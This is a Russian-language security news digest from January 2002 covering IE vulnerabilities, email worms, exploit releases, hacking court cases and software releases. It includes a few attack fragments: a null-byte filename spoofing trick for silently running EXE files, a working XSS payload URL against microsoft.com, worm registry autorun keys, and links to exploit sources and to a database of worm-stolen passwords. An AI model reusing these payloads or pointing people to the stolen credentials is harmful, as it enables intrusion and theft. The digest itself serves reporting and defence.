В BUGTRAQ опубликованы подробности уязвимостей MSIE "MSIE may download and run progams automatically" (Dec 14 2001) и "File extensions spoofable in MSIE download dialog" (Nov 26 2001). Согласно описанию это было возможно потому, что IE неправильно интерпретировал код %00 (код нулевого байта) в имени файла, который загружается. Таким образом, при загрузке файла с именем "README.TXT%00PROG.EXE" через Content-disposition HTTP-хидер IE показывал этот файл только, как текстовый, при этом на самом деле выполнялся EXE-файл. Если в Content-disposition используется ключевое слово "inline" вместо "attachment" тип MIME-правильный, то IE автоматически загружает программу без какого-бы то ни было Download-диалога и предупреждения. MIME-тип файла может быть установлен через HTTP-заголовок Content-type. Для различных версий IE эти типы файлов различны. Для IE6 - это "text/css", для IE5 - "audio/midi" Автор рекомендует обязательно проверить версию своего броузера IE (ссылка - ниже). Если у вас запустится DOS-окно с сообщением-необходимо срочно пропатчить MSIE. Патченый MSIE покажет Download диалог с именем файла, заканчивающимся на .EXE. Проверить версию своего IE - http://www.solutions.fi/iebug2 Патч от Microsoft - http://www.microsoft.com/technet/security/bulletin/MS01-058.asp
15/01/2002 Internet Explorer Pop-Up OBJECT Tag уязвимость.
10 января была убнаружена уязвимость (локальная и удалённая) в IE 6.0.2600.0000 на Windows 2000 с версиями апдейтов: Q312461, Q240308, Q313675. Как утверждает автор, нашедший эту уязвимость, тэг объекта Pop-Up в IE поддерживает вставку внедрённых объектов. Они могут запускаться в привилегированной области памяти и таким образом позволяют запустить локальные программы удалённо. На странице funRun.html (из URL, приведённого ниже) продемонстрирована возможность запуска локального приложения через IE удалённо через Pop-Up объект, второй пример демонстрирует запуск control panels. Автор советует отключить ActiveScripting или заходить на незнакомые сайты при помощи Netscape броузера. Подробности и демонcтрация уязвимости - http://www.osioniusx.com
15/01/2002 Очередная уязвимость в броузере Internet Explorer 5.0 - содержимое clipboard может быть похищено.Как сообщил 12 января в списке рассылки BUGTRAQ Tom Gilder, он обнаружил уязвимость в броузере IE 5.0, которая позволяет скрипту с сайта-злоумышленника, посещаемого пользователем, похитить содержимое clipboard. Очень часто там могут содержаться критичные данные (E-mail адреса, пароли, рисунки). Ошибка кроется в применении объекта clipboardData MSDN и метода getData. Используя setInterval метод, "враждебный скрипт может проверить содержимое буфера обмена (clipboard) и переслать его содержимое в нужное место, используя скрытую форму или XMLHTTP ActiveX объект.
Для того, чтобы избежать описанной уязвимости автор советует проделать следующие действия. Открыть в IE:Tools -> Internet Options -> Security -> Select a security zone -> Custom Level -> Scripting -> Allowpaste operations via script и выставить уровень Prompt. В этом случае скрипт сможет похитить содержимое буффера обмена, только, если Вы ему это позволите.Более подробно - http://tom.vpwsys.co.uk/clipboard/ Пример эксплоита - http://tom.vpwsys.co.uk/clipboard/exploit.html
14/01/2002 BeFaster - программа для оптимизации соединенияИзвестно, что Windows даёт пользователю доступ не ко всем настройкам соединения с Интернетом. Изменить их с помощью встроенных средств не удастся, если, конечно, не влезать в реестр. Поэтому приходится использовать программы сторонних разработчиков. BeFaster - новая утилита, которая, по словам, разработчиков, позволяет существенно увеличить скорость соединения с Интернетом. Делается это все за счет настройки скрытых параметров Windows. Хотя ко всем из них с помощью BeFaster можно добраться вручную, программа предлагает и более простой для неподготовленного новичка путь. Нажатием одной-единственной кнопки можно выбрать один из предварительно подготовленных наборов настроек для разных типов соединений. Системные требования программы: Pentium 100, 16 мегабайт оперативной памяти, операционная система Windows 95/98/Me/NT/2000/XP. BeFaster имеет статус Freeware. Но с некоторой оговоркой - для некоммерческого использования.Скачать программу - http://tucows.enta.net/files3/befaster.zip
14/01/2002 Microsoft утверждает, что вирус W32.Donut не является вирусом для .Net.
Компания Microsoft выступила с официальным заявлением, утверждая, что вирус W32.Donut, считающийся первым вирусом для платформы .Net, на самом деле не имеет какого-либо отношения к средству создания и управления веб-сервисами. Как считает компания Microsoft, вирус Donut является обычным вирусом для Windows, только его жертвой становятся файлы .Net. "Данный вирус не работает на основе архитектуры .Net и не использует какую-либо уязвимость в системе безопасности платформы", - заявил менеджер компании Microsoft по разработке платформы .Net Тони Гудъю. Однако, представители антивирусных компаний, исследовавшие вирус, придерживаются иного мнения. Компании Symantec и Network Associates считают, что вирус Donut использует уязвимости в архитектуре .Net, и, следовательно, может считаться вирусом для, пока официально не выпущенной платформы. Наличие уязвимостей в архитектуре .Net может сказаться пагубно на имидже компании, так как в будущем, возможно, веб-приложения на базе .Net будут использоваться при проведении стратегически важных, с точки зрения безопасности, операций, таких как банковские переводы и покупки в интернете. Подробности - http://www.compulenta.ru/news/2002/1/13/24161/
14/01/2002 Выпущена утилита для борьбы с вирусом RST.b, поражающим Linux-системы.
Производитель средств компьютерной безопасности, компания Qualys, представила бесплатную утилиту для борьбы с вирусом Remote Shell Trojan. Новый вариант вируса, имеющий кодовое имя RST.b, поражает операционные системы на основе Linux, и дает возможность получения полного контроля над системой удаленно. Как сообщают в Qualys, новый вариант вируса более опасен, нежели его предшественник. Троян дает возможность удаленным хакерам получать контроль над системой. Это может привести к раскрытию важной информации, либо к полному уничтожению системы. После заражения, вирус пытается подключится к серверу, расположенному в штате Вашингтон, США и скачивает оттуда файл, содержащий следующее сообщение: "This account has been terminated for virus abuse. We are a free web hosting company and anyone may post or create PHP files. This machine has NOT been compromised". Компания Qualys предлагает бесплатную утилиту для обнаружения и удаления вируса RST.b из системы, ее можно загрузить, зарегистрировавшись на сайте компании. Подробности - https://www.qualys.com/forms/remoteshellb.html
14/01/2002 Выпущена версия 1.0 программы OpenPKG для Linux.
Разработчики программы OpenPKG сообщили о выпуске версии 1.0 утилиты для установки и управления программным обеспечением на различных Unix-совместимых операционных системах. Непосредственно поддерживаются операционные системы FreeBSD, Linux и Solaris. Программа позволяет устанавливать и администрировать программное обеспечение с использованием единой архитектуры, что упрощает процесс установки ПО в больших компьютерных сетях. OpenPKG использует технологию Red Hat Package Manager (RPM), на основе ее предлагая эффективную системную службу для управления программными пакетами. Программа не требует предварительной установки каких-либо пакетов программ, поддерживается возможность многократной установки. Программа поставляется согласно положениям Open Source. Cкачать можно с FTP-сайта компании - ftp://ftp.openpkg.org/release/1.0/SRC
14/01/2002 Выпущена новая версия браузера Opera 6 - Opera 6.01 Beta для Windows.
Компания Opera Software без особого шума выпустила обновление к шестой версии браузера собственной разработки Opera 6.01 Build 1022. Обновленная Opera избавилась от значительного количества багов в ядре программы, в представленной в шестой версии поддержке шрифтов Unicode, в интерфейсе и почтовом клиенте. Несмотря на ожидаемое улучшение стабильности, разработчики предупреждают о том, что это бета-версия программы, и она может содержать ошибки в программном коде. Пока существует только версия для ОС Windows.Cкачать можно здесь - http://people.opera.com/~windows/o601_1022.exe
13/01/2002 В отделении BugTraq.ru "Закон" открылся новый подраздел "free soft".
Что там нового: + GNU General Public License, английский текст + Универсальная общественная лицензия GNU, перевод: О.В. Кузина, В.М. Юфа (1993), О.С. Тихонов, (1998) + Перевод на русский язык General Public License GNU, автор перевода Елена Тяпкина (2001) + Открытое лицензионное соглашение GNU, автор перевода Павел Протасов (2002) + GNU Free Documentation License, английский текст + Перевод на русский язык Лицензии GNU на свободную документацию автор перевода Елена Тяпкина (2001). Подраздел free soft: http://law.bugtraq.ru/freesoft/
13/01/2002 Новое на нашем форуме: Поиск..
Теперь на форуме можно осуществлять поиск, как по отдельным словам, так и по словосочетаниям. Пользуйтесь на здоровье.
12/01/2002 Обновление архивов - Форум: BugTraq.Ru - Programming, Форум: Development - программирование и разработка ПО под Linux/Unix.
По многичисленным просьбам наших посетителей, теперь архивы выложены в zip формате из-за того, что rar архивы скачивались некорректно. Форум: BugTraq.Ru - Programming Форум: Development - программирование и разработка ПО под Linux/Unix
12/01/2002 Вятского студента, промышлявшего хакерством, приговорили к трём годам лишения свободы.
С сегодняшнего дня вступает в силу приговор суда в отношении жителя Вятки, промышлявшего хакерством. Как сообщает информационное агентство "ВолгаИнформ", используя свой персональный компьютер, студент Кировского авиационного техникума с помощью специальной программы, взламывал компьютеры организаций и граждан. Получив доступ к чужой системе, хакер скачивал оттуда конфиденциальную информацию. Такая деятельность позволяла ему обеспечивать оплату доступа в Сеть за счет других пользователей. Следствием установлено, что своими действиями он причинил ущерб на сумму более четырех тысяч рублей. Суд признал его виновным в совершении преступления и приговорил к трем годам лишения свободы. Правда, учитывая чистосердечное раскаяние, хакер получил свой срок условно. Подробности - http://www.volgainform.ru
12/01/2002 Ричард Столлмэн: Положим конец пересылке документов в формате Word.
Вчера на сайте LinuxToday основатель Фонда свободного программного обеспечения Ричард Столлмэн разместил статью, в которой призывает всех отказаться от отправки документов друг другу в формате Word. "Большинство пользователей работают в Microsoft Word, что для них самих невыгодно, так как Word - это патентованная программа, не позволяющая пользователям свободу распространения, изучения и копирования", - поясняет Столлмэн. Столлмэн с сожалением отмечает тот факт, что пересылка e-mail с прикрепленным документом именно в формате Word уже давно стала традицией. "Люди публикуют тексты в формате Word, некоторые организации принимают документы только в формате Word. Иногда при поиске работы для того, чтобы подать резюме, нужно обязательно воспользоваться этой программой", - говорит основатель Фонда свободного ПО. В статье Столлмэна также говорится о том, что формат файла Word в каждой новой версии несовместим с остальными версиями, что вынуждает пользователя постоянно покупать обновления от компании Microsoft. Кроме того, очевидно, что для пользователей свободных операционных систем документы Word - неудобство. Подробности - http://www.compulenta.ru/news/2002/1/11/24096/
12/01/2002 Пять причин, почему не стоит устанавливать Linux у себя дома.
На одном из интернет-сайтов недавно была опубликована статья одного чрезмерно придирчивого родителя, который обнаружил, что его сын - хакер. В той же статье отец семейства приводит 10 признаков того, что ваш ребенок попал под гнусное влияние компьютерного мира. Одна из причин - это наличие на компьютере чада операционной системы Linux. Действительно, Linux предрасполагает любого к изучению основ компьютера и программирования - без знания этих основ в ОС вряд ли можно нормально работать. Конечно, статья озабоченного родителя является шуткой, однако она повлекла за собой массу аналогичных, в том числе и на сайте ReactiveLinux, где была размещена статья под названием "Пять причин, почему не стоит использовать Linux". Далее следуют эти пять причин, почему любой законопослушный гражданин при появлении Linux на его компьютере должен сразу же отформатировать свой винчестер и поставить правильную систему Windows. Вкратце эти 5 причин: 1. Linux - это инструмент шпиона 2. В Linux спрятаны вредоносные программы 3. Linux учит детей врать и дискриминировать женщин 4. Linux - это рай для пиратов 5. Linux - это вирус! (выдержка из статьи-"И Linux, и так называемый Lilo - это вирусы. Lilo - это маленький вирус, использующийся для загрузки большого вируса, вируса Linux") Довольно прикольно-рекомендую почитать - http://www.compulenta.ru/news/2002/1/11/24113/
12/01/2002 Вирус Gigger - редкий, но меткий.
Очередной e-mail вирус, получивший название Gigger, терроризирует пользователей компьютеров, работающих на платформе Windows. Worm приходит на определенный адрес электронной почты в качестве вложения mmsn_ofline.htm (поражает только компьютеры, на которых в качестве почтового клиента установлен Outlook Express), меняет настройки постового клиента с тем, чтобы рассылать себя по адресам, указанным в списке контактов. По словам специалистов компаний-производителей антивирусного программного обеспечения Sophos и F-Secure, вирус написан в кодировке, которая встречается достаточно редко. Это сочетание Visual Basic Script Code и JavaScript. Тем не менее противоядие уже есть, поэтому пользователи антивирусного ПО Symantec, Sophos и F-Protect уже могут скачивать с сайтов этих компаний обновления, позволяющие обнаружить и автоматически удалять Gigger Подробности - http://www.newsbytes.com
12/01/2002 Сниффер для WinXP, Win2K - NGSSniff.
NGSSoftware представила для тестирования сниффер (анализатор пакетов) для ОС WinXP, Win2K. Основной отличительной способностью данной программы является то, что для работы её не требуется дополнительных драйверов и анализ пакетов может выполняться "на лету" (в процессе работы сниффера). Выложена бета-версия для тестирования. Подробности - http://nextgenss.com/products/ngssniff.html
12/01/2002 Очередной CGI-сканер.
В списке рассылки BUGTRAQ вчера был анонсирован очередной сканер screamingCobra. Изначально он разрабатывался дл *nix-операционных систем, но сейчас автор включил Перл-скрипт и Win32 бинарники. Более подробно - http://cobra.LucidX.com Текущая версия - http://cobra.LucidX.com/CURRENT.tar.gz
11/01/2002 Первый релиз ОС Simply GNUstep.
Разработчики операционной системы "Simple GNUstep" объявили о своем первом открытом релизе. ОС построена на ядре Linux и базовом ПО GNU. Графическая система построена на GNUstep, свободно-распространяемой реализации базовых библиотек NeXT. Основной целью авторов дистрибутива является совместимость по исходным текстам с Apple MacOS X. Подробности - http://www.osnews.com/story.php?news_id=498
11/01/2002 Путин подписал закон об ЭЦП .
В четверг, 10 января, Президент Российской Федерации Владимир Путин подписал закон "Об электронной цифровой подписи" (ЭЦП). Первой страной, признавшей электронную подпись, были Соединенные Штаты. Там закон вступил в силу в октябре 2000 года. Закон уравнивает электронную (цифровую) подпись в электронном документе с собственноручной подписью на бумажном носителе. Файлы, подписанные ЭЦП, будут теперь иметь юридическую силу и доказательную силу в суде, наравне с документами на бумаге. Подробности - здесь.
11/01/2002 Хакер, в 1999 г. взломавший компьютер американской ядерной лаборатории, сознался в содеянном.
В начале этой недели хакер Бенжамин Бройнингер (Benjamin Breuninger), более известный под псевдонимом Konceptor признал себя виновным в совершенном в ноябре 1999 г. взломе сети Национальной лаборатории им. Лоренса Ливермора, которая специализируется на ядерных исследованиях. Взломанная хакером сеть не была засекречена и не содержала конфиденциальной информации. Совершив взлом, Бройнингер оставил в для себя "черный ход", который работал в течение 10 дней. За это время хакеру удалось похитить информацию о финансировании исследований. Признание Бройнингера произошло всего за неделю до начала официальных слушаний по его делу и стало возможным после заключения судебной сделки между хакером и его обвинителями. Кроме самого факта взлома хакер признался в причинении лаборатории ущерба на сумму 20 тыс. долл., что соответствует затратам на восстановление безопасности компьютерных систем. Кроме этого Бройнингер заявил, что совершил взлом с целью побороть в себе депрессию и суицидальные настроения. Максимальное наказание, которое грозит хакеру составляет 5 лет тюрьмы, однако, учитывая факт заключения судебной сделки, можно предпоожить, что вердикт суда будет значительно более мягким. Подробности - http://www.securityfocus.com
11/01/2002 Троян в пакете AIM Filter.
Команда w00w00, обнаружившая уязвимость в AIM (AOL Instant Manager) сообщает, что в программе AIM Filter от Робби Сандерса, которая была рекомендована для закрытия дыры в AIM, содержится программная закладка (backdoor), посылающая важную системную информацию на определённый E-mail и открывающая вэб-броузеры для соединения с порно-сайтами (по-видимому, автор решил таким образом дополнительно подзаработать на кликах). w00w00 переработали код на безопасный и выложили его в Интернете. "Чистая версия" AIM Filter -http://www.w00w00.org/files/w00aimfilter.zip
11/01/2002 cgiaudit - пакет, помогающий создавать безопасные CGI-приложения.
В списке рассылки BUGTRAQ анонсировался пакет, который помогает программистам, пищущим CGI-приложения для своих WWW-серверов проверять свой код на безопасность. Типы атак на CGI-скрипты можно конфигурировать в самом пакете для дальнейшего их предотвращения. Кроме того, в пакет включён спайдер, поддержка прокси (сервера-посредника) и возможность формирования запросов в HEX-формате. Исходники доступны для скачивания - http://www.innu.org/~super/cgiaudit-1.0.tar.gz
11/01/2002 Macromedia выпустила патч для Shockwave Flash player.
Как сообщила фирма Macromedia в списке рассылки BUGTRAQ, в их продукте Shockwave Flash player для операционной системы Windows содержится баг, который позволяет запустить опасный код при просмотре этим плэером приатаченных к E-mail или скачаныых с WWW flash-файлов. Фирма выпустила патч и настоятельно рекомендует всем пользователям пропатчить свою версию продукта. Об этой уязвимости мы сообщали в наших новостях 9 января. Более подробно о патче - http://www.macromedia.com/support/flash/
10/01/2002 Безопасность IE 6.0 - чат со специалистами Microsoft.
Сегодня, 10 января 2002 г., в 2:30-3:30 GMT состоится онлайн-беседа со специалистами корпорации Microsoft - MCSA Chat with Robert Stewart & Anne Marie McSweeney. Предметом обсуждения станет IE 6.0, его возможности и характеристики в области безопасности. Кроме этого, будет затронут вопрос о нововведениях в системе Microsoft Certified System Administrator credential (MCSA). Адрес Чата: http://www.microsoft.com/technet/itcommunity/chats/Default.asp Источник: http://www.bezpeka.com
11/01/2002 ВНИМАНИЕ: Исходники форума нашего сайта!.
Впервые, ВАМ предоставляется возможность скачать исходник и все необходимые файлы от нашей борды. Был сделан отдельный сайт разработки и написана документация по установке. Пока это неофициально, потому что не все закончено, однако, Все, кто желает принять участие в тестировании или просто хочет быстрее получить этот исходник - могут вполне это сделать. Все кто хочет получить адрес сайта разработки, где можно скачать скрипт должны прислать письмо с запросом на: mafia_zhivet@hotmail.com
10/01/2002 Редактор трёхмерной графики Maya, используемый Голливудом для создания спецэффектов в кино, будет распространяться бесплатно. В понедельник компания Alias Wavefront объявила о том, что Maya - программный пакет, служащий для создания трехмерной графики, станет бесплатным для некоммерческого использования. Коммерческая версия Maya стоит 7500 долларов. В настоящий момент идет разработка бесплатной версии Maya Personal Edition для операционных систем Windows и Mac OS X. Компания обещает, что Maya Personal Edition выйдет уже в феврале этого года. Программа будет бесплатна для загрузки, либо ее можно будет купить на CD по минимально возможной цене. Пользователи программы также бесплатно получат доступ к библиотекам графических файлов проекта Maya, доступным для коммерческих пользователей. Единственное ограничение, налагаемое на работу программы - это то, что на все разработанные в ней изображения будут содержать пометку. Кроме того, изображения можно сохранять в несовместимом с другими специальном формате. Maya считается одним из самых профессиональных и мощных трёхмерных редакторов, существующих в настоящее время. Среди пользователей Maya - Industrial Light & Magic, Pixar, Weta, Digital Domain, Disney, Electronic Arts, Nintendo, Sega и Square. Он используется при создании спецэффектов ведущими киностудиями, и в последнее время без него не обходится почти ни один голливудский фильм.
Подробности - http://www.aliaswavefront.com
10/01/2002 Exploit for DOS UPNP for WinXP.
Как мы ранее сообщали в новостях в операционной системе WindowsXP обнаружена уязвимость в службе UPNP, приводящая к Denial of Service (отказ в обслуживании). В списке рассылки BUGTRAQ опубликованы исходники программ, позволяющие воспользоваться этой уязвимостью. Одна программа посылает UDP-пакет на порт 1900 с запросом NOTIFY. Запрос имеет URL, который WinXP использует для открытия TCP-соединения. Вторая программа (chargen.c) заполняет память XP и машина входит в нестабильное состояние со 100-проц. загрузкой ЦПУ. Подробности - http://www.securityfocus.com/archive/1/249238 Исходник upnp_dos - http://www.securityfocus.com/attachment/2002-01-10/upnp_udp.c Исходник chargen - http://www.securityfocus.com/attachment/2002-01-10/chargen.c
10/01/2002 Новая версия звуковых драйверов для LINUX - OSS 3.9.6b.
Возможность записи звука прямо с микшера. Новые драйвера для SoundBlaster Live и беты для Audigy. Обновлён VIA8233 ,CMedia CM8738 с 4/6 канальной поддержкой , National Semiconductor Geode (CS5530) драйвер. Ноые фичи с 4х канальными виртуальными миксерами. etc. Более подробно - http://www.opensound.com/
10/01/2002 Новый софт для DNS-сервера.
В 1999-2000 г. прокатилась волна взломов UNIX-серверов. При этом были использованы уязвимости в реализациях DNS-серверов, присущие BIND (Berkley Internet Name Domain). В выпущенном после этого релизе BIND 9 пока не нашли уязвимостей. Код BIND был значительно переписан для обеспечения безопасности реализации DNS-протокола. Однако помимо BIND существуют и другие программные реализации для UNIX DNS-серверов. Среди них можно назвать такие проекты: DjbDNS, Pdnsd, Posadis, Dent. Вчера в BUGTRAQ был анонсирован новый проект DNS-сервера - MaraDNS. По описанию автора, это безопасный DNS-сервер, запускающийся от имени непривилегированного UID, имеющий собственный механизм CHROOT. Сервер написан на основе собственной string-библиотеки, которая, по словам автора, защищена от атак типа переполнение буфера. MaraDNS предоставляется свободно и в исходных кодах. Более подробно ознакомиться с проектом - http://sourceforge.net/projects/maradns
10/01/2002 Документ по UNICODE-переполнению буфера.
NISR - NGSSoftware Insight Security Research опубликовала документ, детально разбирающий технику написания эксплоита для Unicode buffer overflow. Предполагается, что ознакомление с этим документом поможет разработчикам, пишущим свои приложения для защиты от подобных уязвимостей. Документ в формате PDF доступен на - http://www.nextgenss.com/research.html
10/01/2002 В США принят закон по борьбе со спаммерами.
В начале января 2002 г. в 18 штатах США принят закон по борьбе со спамом. Согласно этому закону, при массовой рассылке должны обязательно указываться ИСТИННЫЕ координаты посылающего лица. Закон также обязывает спаммеров указывать в массовой рассылке контактный E-mail или телефон для отписки от списка рассылки. Кроме того, в теме письма (SUBJECT) обязательно должны стоять буквы ADV (или ADV:ADLT-если материал в письме носит сексуальный характер). По идее, это должно значительно облегчить создание почтовых фильтров по борьбе со спамом. Подробности - http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/2002/01/04/MN228257.DTL
9/01/2002 Новое в разделе новостей: Теперь можно скачать все новости за 2001ый год в одном файле..
Скачать в ZIP архиве: http://www.uinc.ru/scripts/load.cgi?news/archive/news_2001.zip Скачать в TGZ архиве: http://www.uinc.ru/scripts/load.cgi?news/archive/news_2001.tgz
9/01/2002 Провайдер торгует данными, которые украл троян .
Мелкий интернет-провайдер Сан-Франциско MonkeyBrains, в распоряжении которого оказались многочисленные логины и пароли, наворованные в течение прошлого года известным червем Badtrans, решил сделать на этих данных небольшой бизнес. За 10 долларов он предоставляет заинтересованным компаниям список принадлежащих им аккаунтов и почтовых адресов, оказавшихся в базе пораженных червем компьютеров. Почтовый червь Badtrans был обнаружен в апреле 2001 года, но эпидемию вызвал в ноябре, заразив миллионы компьютеров. Основная функция червя - воровство паролей. При открытии каждого ового окна на зараженном компьютере троянец создает лог-файл, в котором фиксирует набираемые на клавиатуре комбинации. Эти логи отсылались главным образом на анонимный ящик suck_my_prick@ijustgotfired.com, зарегистрированный на бесплатном почтовом сервисе IJustGotFired.com провайдера MonkeyBrains. С 24 ноября туда стали падать более 100 подобных писем в минуту. В первый день было получено свыше 100 000 лог-файлов с зараженных компьютеров, всего их скопилось около 6 миллионов. Подробности - http://www.netoscope.ru/news/2002/01/08/4481.html База данных паролей (около 300 000 эккаунтов) - http://badtrans.monkeybrains.net
9/01/2002 Операционная система Solaris 9 не будет поддерживать процессоры Intel.
Компания Sun Microsystems объявила о том, что не собирается реализовывать поддержку процессоров Intel в своей новой операционной системе Solaris 9. В Sun считают, что поддержка чипов от Intel нецелесообразна с экономической точки зрения - большинство корпоративных клиентов используют Solaris на платформе Sun UltraSparc, а Intel-серверы с Solaris в качестве ОС используются в основном в университетах на льготных условиях. Отказавшись от поддержки процессоров Intel Sun сможет добиться значительной экономии средств на тестировании и поддержке своей новой ОС. При этом поддержка Solaris 8 для процессоров Intel будет продолжаться еще как минимум 7 лет. Вместе с тем, аналитики считают, что с отказом от поддержки чипов Intel в своей новой ОС Sun не отдаст свою долю рынка Microsoft, поскольку многие пользователи продолжат работать с Solaris 8, а другие скорее перейдут на Linux, чем на Windows. Причина этого весьма проста - Solaris, как и Linux, базируется на ОС UNIX и переход между двумя этими системами в любом случае будет более простым, чем миграция на Windows, основанную на совершенно других принципах. Источник - http://www.infoworld.ru/
9/01/2002 Решением суда в Германии приостановлены поставки ОС SuSe Linux.
Разработчик дистрибутивов на базе операционной системы Linux, компания SuSe вынуждена приостановить продажу последней версии ОС в Германии, в результате решения немецкого суда. Представитель SuSe в Германии сообщил, что компании временно запрещена поставка партий операционной системы в Германии, однако уже поступившие в розничную сеть копии могут быть проданы. Причина такого решения суда заключается в том, что против SuSe начато судебное разбирательство по обвинению в нарушении авторских прав. Кто подал иск и какая программа стала причиной разбирательтсва - пока не сообщается, однако от представителя британского отделения SuSe стало известно, что суд был инициирован автором программы Crayon, код которой, по предварительным данным, был включен в поставку SuSe Linux без согласия автора. Подробности - http://www.zdnet.com
9/01/2002 Хакеры все чаще атакуют правительственные сайты.
Рост политической напряженности в мире не мог не сказаться на характере деятельности хакеров. Так, исследовательское подразделение компании mi2g установило, что в Великобритании число атак на правительственные сайты выросло на 378%. В абсолютном выражении цифры несколько менее впечатляющи - в 2001 г. было зафиксировано 43 атаки против 9 в 2000, однако рост все равно можно назвать значительным. Что касается атак на коммерческие домены в зоне .co.uk, то их число выросло со 137 до 385 или на 187%. Как считают в mi2g, за рост числа атак ответственность несут антиглобалисты, противники НАТО, а также и обычные преступники. Как и раньше, наибольшее число атак - около 30% - пришлось на зону .com. Здесь необходимо отметить, что и число доменов в этой зоне значительно больше, чем в остальных. Количество атак на серверы в американской правительственной зоне .gov выросло на 37%, а в военной зоне .mil - на 128%. Среди национальных доменов по числу атак лидировали китайский .cn и тайваньский .tw. на их долю пришлось 9% от общемирового количества хакерских атак, что можно объяснить "противостоянием двух Китаев" - КНР и Тайвань не признают независимости друг друга и претендуют на звание "единственного Китая". Наибольший рост числа хакерских атак в относительном выражении был отмечен в Израиле (на 220%), Индии (205%) и Пакистане (300%). Аналитики mi2g объясняют этот рост прежде всего ростом политической и военной напряженности в соответствующих регионах. Подробности - http://www.compulenta.ru/news/2002/1/9/23985/
9/01/2002 Обнаружена уязвимость в программе Mutt - популярном почтовом клиенте для Linux.
Сообщения о дырах в почтовых клиентах для Windows, в частности Outlook и Outlook Express, появляются с завидным постоянством, но, как оказалось, не только эта платформа уязвима для хакеров. Так в самом начале января в списке рассылки BUGTRAQ появились сообщения об обнаружении уязвимого места в почтовом клиенте Mutt, который входит в комплект многих дистрибутивов ОС Linux, включая RedHat Linux. Обнаруженная дыра связана с весьма распространенной проблемой переполнения буфера. В результате, отправив на адрес жертвы специальным образом составленное электронное письмо, злоумышленник может получить контроль над компьютером и получить все права, которыми обладает данный пользователь. Разработчики Mutt уже выпустили необходимую заплатку. Подробности и заплатка - http://www.mutt.org/
9/01/2002 Обнаружен первый вирус, способный прятаться в файлах Macromedia Flash.
Антивирусная компания Sophos сообщила о появлении первого вируса, заражающего файлы популярного формата Macromedia Flash. Сотрудники компании получили вирус, названный автором SWF/LFM-926, в анонимном электронном письме, к которому был прикреплен зараженный файл. При этом вирус не несет в себе большой опасности, и целью его создания, по всей видимости, было показать уязвимость Flash. В то же время в Sophos предупреждают, что SWF/LFM-926 может стать лишь началом новой волны вирусов, масштабы которой могут превысить все известные до сих пор вирусные эпидемии. В частности, по данным Macromedia, средствами для просмотра Flash располагают сегодня 97% пользователей Интернета. Здесь же стоит отметить, что "мультики" на Flash весьма популярны среди аудитории Интернета и часто пересылаются в виде вложений к электронным письмам. При открытии файла, зараженного SWF/LFM-926, на экране появляется надпись "Loading.Flash.Movie", а затем демонстрируется анимация с изображением цифровой головоломки. Во время демонстрации вирус, написанный на ActionScript - внутреннем языке Macromedia Flash, запускает DOS-отладчик, который создает исполняемый файл с именем v.com, который затем запускается и записывает копию вирусного скрипта в другой Flash-файл, находящийся в той же папке на диске. В Sophos также отмечают, что действие вируса проявляется только при открытии файла с локального диска. При просмотре анимации через Интернет вирус не опасен. Подробности - http://www.newsbytes.com/
9/01/2002 Немного обновлен наш Forum FAQ..
Добавлены новые вопросы: + Как расшифровать нужное мне сокращение? + Как узнать к какой стране принадлежит какой-то домен первого уровня? + Я вот тут наткнулся на диске на файл с расширением *.xxx, чо за файл то? (изменен) + Где взять программу Legion? Ознакомиться с FAQ можно здесь: http://www.uinc.ru/forum/faq.shtml
8/01/2002 Фанаты фильма "Матрица" пустили в Сеть нового почтового червя.
Техническая Лаборатория компании Panda Software сообщает об обнаружении очередного почтового червя. W32/Shatrix - червь, рассылающий себя по всем адресам, которые содержатся в адресной книге MS Outlook. Кроме того, он перемещает текущее окно по экрану, модифицирует реестр Windows и пытается удалить ряд файлов. Письмо, в котором содержится червь, выглядит следующим образом: Тема: FW: Shake a little. Содержание: This will shake your world :-). Приложение: SHAKE.EXE (этот файл и содержит червя) Если пользователь открывает приложение, червь быстро перемещает текущее окно по экрану. Затем он копирует себя в директорию Windows под именем, составленным из восьми случайно отобранных знаков (букв и цифр). Для того, чтобы автоматически запускаться при каждом включении компьютера W32/Shatrix добавляет следующие значения в реестр Windows: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SystemInf %Windows system directory%\"file name" HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run SystemInfoM %Windows system directory%\"file name" Далее червь попытается уничтожить ряд файлов. И, наконец, необходимо добавить, что код червя содержит следующие текстовые строки: MatriX is out there MatriX has You... MatriX is All around You Очевидно, авторы нового червя являются большими поклонниками фильма "Матрица". Подробности - http://www.compulenta.ru/news/2002/1/8/23935/
8/01/2002 В службе удаленного управления счетом банка Citibank обнаружена серьезная уязвимость.
Как стало известно, специалист по компьютерной безопасности Дэвид Девитри обнаружил ряд уязвимостей в системе онлайнового управления счетом банка Citibank. Сайт банка C2it.com может использоваться клиентами для управления счетом и проведения денежных переводов через интернет. Как сообщил Девид, используя дыру в защите онлайновой банковской службы, можно получить доступ к данным о клиентах банка. Более того, существует возможность снять деньги со счета клиента, либо перевести их на другой счет. Дэвид Девитри опубликовал подробности об уязвимости в понедельник. В своем интервью на сайте MSNBC, эксперт по безопасности заявил следующее: "Использование уязвимостей позволяет автоматически переводить деньги со счетов Citibank. Возможно также получить информацию о клиентах банка, номера кредитных карт". Представитель Citibank, в ответ на информацию о дырах в защите, заявил, что работа по улучшению безопасности сайта ведется постоянно. Подробности - http://www.neowin.net
8/01/2002 Cервер www.microsoft.com подвержен атаке типа cross-site scripting.
Как написал в письме в списке рассылки BUGTRAQ некий frog, сервер фирмы Microsoft подвержен атаке типа cross-site scripting. Автор демонстрирует её в таком виде. http://www.microsoft.com/freedomtoinnovate/inc/sendfriend.asp?sAddress=">"левая угловая кавычка"script"правая угловая кавычка"alert('Microsoft%20hole')"левая угловая кавычка"script"правая угловая кавычка" Подробности - http://www.securityfocus.com
7/01/2002 gcc 3.0.3.
Вышел новый bug-fix релиз компилятора GCC: 3.0.3. В этой версии были исправлены обнаруженные в предыдущей версии ошибки, включая ошибку, приводившую к падению компилятора при сборке ядра Linux. Подробности - http://lwn.net/2002/0103/a/gcc303.php3
6/01/2002 Массачусетский технологический институт подал иск против Microsoft и еще 93 компаний о нарушении патента на графическое ПО.
Массачусетский технологический институт (MIT) и калифорнийская компания Electronic For Imaging подали иски против 94 компаний, включая и Microsoft, о нарушениях патентного права. Представители MIT обвиняют эти компании в нелегальном использовании разработанного в институте графического ПО, исключительные права на которые принадлежат EFI. Срок патента заканчивается в этом году, однако, по утверждениям MIT и EFI перечисленные в иске компании уже используют это ПО в своих цифровых камерах и сканнерах. Подробности: http://www.compulenta.ru/news/2002/1/6/23911/
